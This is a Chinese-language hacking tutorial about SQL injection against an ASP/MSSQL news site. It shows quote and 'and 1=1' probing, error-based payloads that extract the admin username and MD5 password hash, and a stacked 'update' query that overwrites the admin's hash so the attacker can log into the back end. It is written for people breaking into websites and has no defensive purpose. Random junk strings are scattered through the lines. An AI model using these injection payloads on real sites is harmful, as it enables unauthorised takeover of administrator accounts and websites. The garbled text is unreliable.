经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
: l1 p; V: i u9 V" p! }1 T可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
9 U5 s3 B( ]. K9 }$ V# B测试如下:, {( F. d/ T" A& `
http://www.tmdsb.com/news.asp?id=121
4 e/ i7 q0 t7 Q9 T$ a* o9 R3 r* M' ]) b在地址后输入单引号,显示
1 ?5 z+ y1 Q/ \5 K P( a EMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
8 m8 E9 g$ N# W% o) f字符串 ’’’ 之前有未闭合的引号
2 M/ L- G3 M7 z' J; Z0 G8 Y/news/tmdws.asp,行63
) |, c# P* @3 G( M) b U' m7 {说明没有过滤单引号且数据库是MSSQL.1 B0 T/ g2 z7 P8 V- i' q
and 1=1正常。and 1=2出错。肯定存在注入
; U! `) v4 V& D. n% H& C: m接着输入. U( ~+ M/ \ N0 u
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
* J7 \5 H# M8 _, T y) o得到帐号为:admin
6 x0 m* i" x- p! l- M& o+ f" k* }http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin): r3 Y; t4 g8 q1 l* C c4 a2 Y
得到密码为:a4716077c2ba075c
6 b* l; B& z3 }% S7 m接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433: n, O3 c/ w* ?4 t3 Q
命令如下 :3 s1 e, v9 c3 X" ~. j' e/ b
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–4 n% ~1 {; D5 ?9 N$ Q. N# |
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |